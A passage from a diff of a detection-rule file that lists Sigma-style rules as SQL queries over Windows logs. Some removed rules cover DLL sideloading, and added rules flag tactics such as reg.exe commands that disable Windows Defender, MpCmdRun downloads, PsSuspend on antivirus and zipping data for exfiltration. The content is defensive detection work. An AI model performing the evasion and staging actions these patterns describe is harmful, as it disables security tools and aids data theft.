'%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_lolbin_bash.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown", + "Other security solution installers" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN ('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", - "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Detection of PowerShell Execution via Sqlps.exe", + "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "status": "test", + "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this 
case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "author": "Agro (@agro_sev) oscd.community", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\'))))" ], - "filename": "image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", + "title": "Windows Defender Download Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. 
This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Potential Wazuh Security Platform DLL Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. 
Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "APT PRIVATELOG Image Load Pattern", - "id": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", - "status": "test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", + "status": "experimental", + "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", 
- "attack.privilege_escalation", - "attack.t1055" + "attack.t1562.001" ], "falsepositives": [ - "Rarely observed" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'pssuspend.exe' OR (NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", + "id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "status": "test", - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. 
the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName = ''))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' ESCAPE '\\' AND (CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_winzip_password_compression.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "title": "Parent in Public Folder Suspicious 
Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1218.003" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", - "status": "experimental", - "description": "Detects 
both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "title": "WebDav Client Execution", + "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", + "status": "test", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" ], - "filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. 
Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious svchost process start", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentProcessName = '') OR (ParentProcessName = '') OR (ParentProcessName = '-')))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "Potential Rcdll.DLL Sideloading", - "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - "status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", + "title": "Suspicious aspnet_compiler.exe Execution", + "id": 
"a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "status": "test", + "description": "Execute C# code with the Build Provider and proper folder structure in place.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1127" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_lolbin_aspnet_compiler.yml" }, { - "title": "VMGuestLib DLL Sideload", - "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", - "status": "experimental", - "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Zip A Folder With PowerShell For Staging In Temp", + "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "FP could occur if the legitimate version of vmGuestLib already exists on the system" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND 
ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "image_load_side_load_vmguestlib.yml" + "filename": "proc_creation_win_powershell_zip_compress.yml" }, { - "title": "Potential DLL Sideloading Using Coregen.exe", - "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", + "title": "Suspicious RunAs-Like Flag Combination", + "id": "50d66fb0-03f8-4da0-8add-84e77d12a020", "status": "experimental", - "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", - "author": "frack113", + "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. 
seen in PsExec-like tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1055" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_coregen.yml" + "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", - "status": "experimental", - "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "title": "File or Folder Permissions Modifications", + "id": "37ae075c-271b-459b-8d7b-55ad5f993dd8", + 
"status": "test", + "description": "Detects a file or folder's permissions being modified or tampered with.", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1222.001" ], "falsepositives": [ - "Unknown" + "Users interacting with the files on their own (unlikely unless privileged users).", + "Dynatrace app" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\cacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE '%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_iviewers.yml" + "filename": "proc_creation_win_susp_file_permission_modifications.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious 
